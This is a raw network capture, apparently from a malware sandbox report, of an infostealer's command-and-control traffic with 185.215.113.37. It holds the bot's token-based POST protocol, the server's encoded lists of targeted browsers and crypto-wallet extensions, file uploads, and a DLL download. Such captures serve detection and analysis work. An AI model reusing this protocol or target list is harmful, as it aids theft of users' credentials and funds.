Sep 28, 2024 07:32:02.663398981 CEST	407	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:02 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 54 64 6c 4e 54 56 6b 4e 47 51 33 4e 7a 56 6d 4d 6d 52 69 4d 32 51 7a 4e 57 4a 6a 4e 54 4a 6c 4e 54 45 78 4f 44 42 69 4d 32 4a 6c 4e 54 41 30 4d 6d 4d 7a 5a 6d 5a 6d 4e 47 4a 6b 4d 54 46 69 59 6d 5a 6a 5a 6d 56 6b 5a 44 68 6a 4d 6a 6c 68 4d 6a 45 34 59 54 6b 30 4f 47 59 30 5a 6a 64 6b 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NTdlNTVkNGQ3NzVmMmRiM2QzNWJjNTJlNTExODBiM2JlNTA0MmMzZmZmNGJkMTFiYmZjZmVkZDhjMjlhMjE4YTk0OGY0ZjdkfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Sep 28, 2024 07:32:02.664743900 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBA Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="message"browsers------DGHIDAFCGIEHIEBFCFBA--
Sep 28, 2024 07:32:02.890487909 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:02 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 28, 2024 07:32:02.890542030 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 28, 2024 07:32:02.891874075 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 2d 2d 0d 0a Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="message"plugins------FBKFCFBFIDGCGDHJDBKF--
Sep 28, 2024 07:32:03.117698908 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 28, 2024 07:32:03.117753983 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Sep 28, 2024 07:32:03.117789984 CEST	248	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Sep 28, 2024 07:32:03.117837906 CEST	1236	IN	Data Raw: 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d 4e 74 62 6d 74 69 5a 32 35 38 4d 58 77 77 66 44 42 38 56 47 56 36 51 6d Data Ascii: YW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZ
Sep 28, 2024 07:32:03.117871046 CEST	224	IN	Data Raw: 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 46 73 62 47 56 30 66 47 46 70 61 6d 4e 69 5a 57 52 76 61 57 70 74 5a 32 Data Ascii: bmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8Ymhn
Sep 28, 2024 07:32:03.117918968 CEST	1236	IN	Data Raw: 61 47 39 68 62 57 46 77 59 32 52 77 59 6d 39 6f 63 47 68 70 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 74 69 59 57 6c 38 4d 58 77 77 66 44 42 38 51 58 56 30 61 48 6c 38 5a 32 46 6c 5a 47 31 71 5a 47 5a 74 62 57 46 6f 61 47 4a 71 5a 57 5a 6a 59 6d Data Ascii: aG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGp
Sep 28, 2024 07:32:03.117949963 CEST	224	IN	Data Raw: 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47 35 74 62 47 39 70 61 6d 4a 77 62 32 78 6c 61 57 46 74 59 58 77 78 66 44 Data Ascii: aGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8
Sep 28, 2024 07:32:03.117983103 CEST	1236	IN	Data Raw: 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33 42 6b 5a 32 78 6f 59 58 42 6f 62 47 52 68 61 32 6c 72 5a 32 56 6d 66 44 46 38 4d 48 77 77 66 45 31 31 62 48 52 70 64 6d 56 79 63 31 67 67 52 47 Data Ascii: MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2x
Sep 28, 2024 07:32:03.118021011 CEST	468	IN	Data Raw: 61 57 6c 71 5a 57 52 75 5a 33 42 73 5a 6d 70 74 62 6d 39 76 63 48 42 69 59 32 78 72 61 33 77 78 66 44 42 38 4d 48 78 50 63 47 56 75 54 57 46 7a 61 79 42 58 59 57 78 73 5a 58 52 38 63 47 56 75 61 6d 78 6b 5a 47 70 72 61 6d 64 77 62 6d 74 73 62 47 Data Ascii: aWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3B
Sep 28, 2024 07:32:03.119888067 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAECFCAAECBGDGDHIEHJ Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 2d 2d 0d 0a Data Ascii: ------BAECFCAAECBGDGDHIEHJContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------BAECFCAAECBGDGDHIEHJContent-Disposition: form-data; name="message"fplugins------BAECFCAAECBGDGDHIEHJ--
Sep 28, 2024 07:32:03.345062017 CEST	335	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 28, 2024 07:32:03.468221903 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEB Host: 185.215.113.37 Content-Length: 6183 Connection: Keep-Alive Cache-Control: no-cache
Sep 28, 2024 07:32:03.468278885 CEST	6180	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 Data Ascii: ------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 28, 2024 07:32:04.209650040 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 07:32:04.461432934 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 07:32:04.683818102 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:04 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 28, 2024 07:32:06.370707035 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCG Host: 185.215.113.37 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Sep 28, 2024 07:32:07.105274916 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:06 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 07:32:07.178433895 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIIEGIDHCBFIDHJDGDB Host: 185.215.113.37 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Sep 28, 2024 07:32:07.906405926 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 07:32:07.921809912 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCG Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 